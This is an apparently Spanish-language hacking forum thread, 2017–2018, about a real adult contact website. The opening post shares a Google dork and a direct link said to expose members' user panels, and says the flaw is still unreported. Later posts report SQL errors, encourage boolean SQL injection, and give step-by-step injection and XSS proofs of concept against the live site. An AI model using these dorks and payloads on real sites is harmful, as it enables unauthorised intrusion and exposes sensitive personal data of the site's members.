Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Rootkit_Pentester en Marzo 23, 2017, 11:22:40 PM

Título: [Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: Rootkit_Pentester en Marzo 23, 2017, 11:22:40 PM
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

http://www.britishsexcontacts.com/Members/Reply.php?sid=47486 (http://www.britishsexcontacts.com/Members/Reply.php?sid=47486)

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: novak en Marzo 24, 2017, 12:22:58 PM
No podías utilizarlo en una floristería o en una empresa de oficinas heeee. ;D ;D ;D ;D ;D

Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: Rootkit_Pentester en Marzo 24, 2017, 07:58:56 PM
jajaja muy buena!!!.
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: DUDA en Marzo 28, 2017, 06:08:29 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No lo he reportado todavia al admin!!!.

Ya entiendo porque  8)
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: n0z en Marzo 28, 2017, 09:13:58 PM
Les cuento que jugando un poco con esto consegui un sql error. No lo he tratado de explotar aun
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: mahajan344 en Abril 29, 2017, 06:27:11 AM
they have fixed it
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: baah en Mayo 31, 2017, 09:16:44 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

http://www.britishsexcontacts.com/Members/Reply.php?sid=47486 (http://www.britishsexcontacts.com/Members/Reply.php?sid=47486)

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.

bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas  ;D ;D ;D ;D

Un saludo!
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: Rootkit_Pentester en Mayo 31, 2017, 06:15:33 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Citar
bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas  ;D ;D ;D ;D

Un saludo!

Gracias. Un saludo capo!. Y esperamos tus aportes!!!.
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: Hach8D en Mayo 27, 2018, 09:16:28 PM
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

CitarPassword Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.



Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: sadfud en Mayo 30, 2018, 10:05:21 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

CitarPassword Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.



Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

Posiblemente vulnerable a sqli con booleanos, sigue por ese camino :D
Título: Re:[Google Hacking] Leak de Britishsexcontacts!!!
Publicado por: Drok3r en Junio 09, 2018, 09:19:25 PM
Mientras jugaba con tu dork, me di cuenta que britishsexcontacts[.]com es vulnerable a SQL INJECTION y XSS

--> SQL INJECTION
http://www.britishsexcontacts.com/Members/Reply.php?sid=47486'

[!] ERROR SQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
SELECT Filename, Filename_Private FROM qdgirls WHERE ID = 47486' LIMIT 1;

-->XSS y SQL INJECTION
PoC_1

1.- En la pagina principal (http://www.britishsexcontacts.com/Members/index.php) esta un apartado para realizar busquedas (quiero creer que de usuarios)
2.- Una vez identificado esta seccion ponemos una comilla simple ' y nos notificara el error SQL, el cual puede nos permite realizar una inyeccion
3.- En este mismo apartado ingresamos el payload de javascript '"><script>alert(/X/)</script> y nos levatara el alert

:3

--> XSS
PoC
1.- ingresamos a la pagina principal (http://www.britishsexcontacts.com/Members/index.php)
2.- Ya una vez dentro de la pagina, a la URL le agregamos /'"><script>alert(/X/)</script> para que nos quede de la siguiente forma: http://www.britishsexcontacts.com/Members/index.php/'"><script>alert(/X/)</script> y listo
Sólo texto | Texto con Imágenes